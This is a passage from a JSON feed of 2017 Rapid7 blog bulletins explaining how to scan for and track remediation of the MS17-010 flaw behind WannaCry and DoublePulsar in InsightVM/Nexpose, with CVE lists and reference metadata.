To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:671843e7-7237-482e-9c1c-b149f122c46e] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-06-07T14:57:05", "lastseen": "2017-06-19T18:16:21", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/23/protecting-against-doublepulsar-infection-with-insightvm-and-nexpose", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "history": [], "modified": "2017-06-23T21:23:11", "lastseen": "2017-06-24T01:16:32", "published": "2017-06-23T21:23:11", "description": "<!-- 
[DocumentBodyStart:53f4c57c-eea0-4790-a908-f2f47ce880e1] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">After <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> </span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">hit systems around the world last month, security experts warned that the underlying vulnerabilities that allowed the ransomworm to spread are still unpatched in many environments, rendering those systems vulnerable to other hacking tools from the same toolset. Rapid7&#8217;s Project Heisenberg continues to see a high volume of scans and exploit attempts targeting SMB vulnerabilities:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7919-67213/Heisenberg-smb-3.png\"><img alt=\"Heisenberg-smb-3.png\" class=\"image-1 jive-image\" height=\"351\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7919-67213/1600-351/Heisenberg-smb-3.png\" style=\"width: 620px; height: 136px;\" width=\"1600\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">DoublePulsar, a backdoor that has infected hundreds of thousands of computers, is one of the most nefarious of these tools: It can not only distribute ransomware but is also able to infect a system&#8217;s kernel to gain privileges and steal credentials. Identifying and patching vulnerable systems remains the best way to defend against the DoublePulsar implant. 
DoublePulsar is often delivered using the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue exploit package</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&mdash;MS17-010&mdash;which is the same vulnerability that gave rise to the widespread WannaCry infections in May. To help customers, we are reiterating the steps we issued for WannaCry on creating a scan, dynamic asset group, and remediation project for identifying and fixing these vulnerabilities. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, you can <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. </span><span style=\"color: #1155cc; font-size: 11pt; font-family: Arial;\"><br/></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong>Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\"><img class=\"jive-image\" height=\"229\" src=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;Double Pulsar and WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\"><img class=\"jive-image\" height=\"247\" src=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\"><img class=\"jive-image\" height=\"275\" 
src=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\"><img class=\"jive-image\" height=\"265\" src=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. 
Add Check \"<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>\"</span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\"><img class=\"jive-image\" height=\"227\" src=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 195 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; 
font-family: Arial; color: #3f98d4;\">CVE-2017-0148</span></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a Dynamic Asset Group for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> c</span><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">onsole, just under the search button:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\"><img class=\"jive-image\" height=\"157\" src=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as 
well as tagging to quickly identify exposed systems.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a DoublePulsar/WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry and DoublePulsar, you could use this Dashboard filter:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #231f20;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" 
data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting. This will also apply to DoublePulsar</a>.</span></p><h2 dir=\"ltr\"></h2><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a Remediation Project for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\"><img class=\"jive-image\" height=\"144\" src=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\"><img class=\"jive-image\" height=\"456\" src=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\" 
style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now you can give this project a description and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.atlassian.com%2Fsoftware%2Fjira\" rel=\"nofollow\" target=\"_blank\">JIRA</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerability that enables both WannaCry and DoublePulsar infections. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on DoublePulsar, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>. 
</span></p></div><!-- [DocumentBodyEnd:53f4c57c-eea0-4790-a908-f2f47ce880e1] -->", "title": "Protecting against DoublePulsar infection with InsightVM and Nexpose", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 150, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-06-24T01:16:32", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96625", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", 
"MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-06-24T01:16:32", "rev": 2}}, "reporter": "Nathan Palanov", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/protecting-against-petya-like-ransom-worm-with-insightvm-and-nexpose", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "history": [], "modified": "2017-06-28T00:06:12", "lastseen": "2017-06-28T03:17:01", "published": "2017-06-28T00:06:12", "description": "<!-- [DocumentBodyStart:736fb2f2-6580-4bdc-908e-ca4c7c801548] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. 
It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span 